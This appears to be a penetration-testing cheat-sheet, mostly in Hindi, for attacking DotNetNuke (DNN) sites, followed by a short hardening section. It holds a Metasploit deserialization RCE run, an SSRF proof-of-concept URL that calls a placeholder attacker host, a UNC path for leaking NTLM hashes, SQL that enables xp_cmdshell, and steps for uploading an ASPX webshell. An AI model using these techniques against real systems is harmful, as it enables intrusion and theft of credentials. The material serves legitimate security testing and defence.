DotNetNuke (DNN)

DotNetNuke (DNN)

यदि आप DNN में administrator के रूप में प्रवेश करते हैं तो RCE प्राप्त करना आसान है, हालांकि पिछले कुछ वर्षों में कई unauthenticated और post-auth तकनीकों को प्रकाशित किया गया है। निम्नलिखित चीट-शीट आक्रामक और रक्षात्मक कार्य के लिए सबसे उपयोगी प्राइमिटिव्स को एकत्र करती है।

संस्करण और वातावरण गणना

• X-DNN HTTP प्रतिक्रिया हेडर की जांच करें - यह आमतौर पर सटीक प्लेटफ़ॉर्म संस्करण का खुलासा करता है।
• स्थापना विज़ार्ड /Install/Install.aspx?mode=install में संस्करण लीक करता है (बहुत पुराने इंस्टॉलेशन पर पहुंच योग्य)।
• /API/PersonaBar/GetStatus (9.x) निम्न-privilege उपयोगकर्ताओं के लिए "dnnVersion" वाला JSON ब्लॉब लौटाता है।
• लाइव इंस्टेंस पर आप जो सामान्य कुकीज़ देखेंगे:
• .DOTNETNUKE – ASP.NET फॉर्म्स प्रमाणीकरण टिकट।
• DNNPersonalization – XML/serialized उपयोगकर्ता प्रोफ़ाइल डेटा (पुराने संस्करण - नीचे RCE देखें)।

अनधिकृत शोषण

1. कुकी डेसिरियलाइजेशन RCE (CVE-2017-9822 & फॉलो-अप)

प्रभावित संस्करण ≤ 9.3.0-RC

DNNPersonalization हर अनुरोध पर डेसिरियलाइज किया जाता है जब अंतर्निहित 404 हैंडलर सक्षम होता है। इस प्रकार तैयार XML मनमाने गैजेट श्रृंखलाओं और कोड निष्पादन की ओर ले जा सकता है।

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

मॉड्यूल स्वचालित रूप से पैच किए गए लेकिन अभी भी कमजोर संस्करणों (CVE-2018-15811/15812/18325/18326) के लिए सही पथ चुनता है। शोषण बिना प्रमाणीकरण के 7.x–9.1.x पर और 9.2.x+ पर सत्यापित निम्न-privilege खाते के साथ काम करता है।

2. सर्वर-साइड अनुरोध धोखाधड़ी (CVE-2025-32372)

प्रभावित संस्करण < 9.13.8 – पैच अप्रैल 2025 में जारी किया गया

पुराने DnnImageHandler फिक्स का बायपास एक हमलावर को सर्वर को मनमाने GET अनुरोध जारी करने के लिए मजबूर करने की अनुमति देता है (सेमी-ब्लाइंड SSRF)। व्यावहारिक प्रभाव:

• आंतरिक पोर्ट स्कैन / क्लाउड तैनाती में मेटाडेटा सेवा खोज।
• उन होस्टों तक पहुंचें जो अन्यथा इंटरनेट से फ़ायरवॉल किए गए हैं।

प्रूफ-ऑफ-कॉन्सेप्ट (TARGET और ATTACKER को बदलें):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

The request is triggered in the background; monitor your listener for callbacks.

3. NTLM Hash Exposure via UNC Redirect (CVE-2025-52488)

Affected versions 6.0.0 – 9.x (< 10.0.1)

विशेष रूप से तैयार की गई सामग्री DNN को UNC path का उपयोग करके संसाधन लाने का प्रयास करने के लिए मजबूर कर सकती है जैसे \\attacker\share\img.png। Windows खुशी-खुशी NTLM बातचीत करेगा, सर्वर-खाता हैश को हमलावर को लीक करेगा। 10.0.1 में अपग्रेड करें या फ़ायरवॉल पर आउटबाउंड SMB को बंद करें।

4. IP Filter Bypass (CVE-2025-52487)

यदि प्रशासक Host/IP Filters पर निर्भर करते हैं प्रशासन पोर्टल सुरक्षा के लिए, तो ध्यान रखें कि 10.0.1 से पहले के संस्करणों को एक रिवर्स-प्रॉक्सी परिदृश्य में X-Forwarded-For को हेरफेर करके बायपास किया जा सकता है।

Post-Authentication to RCE

Via SQL console

Settings → SQL के तहत एक अंतर्निहित क्वेरी विंडो साइट डेटाबेस के खिलाफ निष्पादन की अनुमति देती है। Microsoft SQL Server पर आप xp_cmdshell को सक्षम कर सकते हैं और कमांड उत्पन्न कर सकते हैं:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Via ASPX वेबशेल अपलोड

1. Settings → Security → More → More Security Settings पर जाएं।
2. Allowable File Extensions में aspx (या asp) जोड़ें और Save करें।
3. /admin/file-management पर जाएं और shell.aspx अपलोड करें।
4. इसे /Portals/0/shell.aspx पर ट्रिगर करें।

Windows पर विशेषाधिकार वृद्धि

एक बार जब कोड निष्पादन IIS AppPool<Site> के रूप में प्राप्त हो जाता है, तो सामान्य Windows विशेषाधिकार वृद्धि तकनीकें लागू होती हैं। यदि बॉक्स कमजोर है, तो आप इसका लाभ उठा सकते हैं:

• PrintSpoofer / SpoolFool का उपयोग SeImpersonatePrivilege का दुरुपयोग करने के लिए।
• Service Accounts से बचने के लिए Juicy/Sharp Potatoes।

हार्डनिंग सिफारिशें (ब्लू टीम)

• कम से कम 9.13.9 (SSRF बायपास को ठीक करता है) या बेहतर 10.0.1 (IP फ़िल्टर और NTLM मुद्दे) में Upgrade करें।
• स्थापना के बाद अवशिष्ट InstallWizard.aspx* फ़ाइलें हटा दें।
• आउटबाउंड SMB (पोर्ट 445/139) ईग्रेस को अक्षम करें।
• DNN के भीतर के बजाय एज प्रॉक्सी पर मजबूत Host Filters लागू करें।
• यदि अनुपयोगी हो तो /API/RemoteContentProxy तक पहुंच को ब्लॉक करें।

संदर्भ

• Metasploit dnn_cookie_deserialization_rce मॉड्यूल दस्तावेज़ – व्यावहारिक अनधिकृत RCE विवरण (GitHub)।
• GitHub सुरक्षा सलाह GHSA-3f7v-qx94-666m – 2025 SSRF बायपास और पैच जानकारी।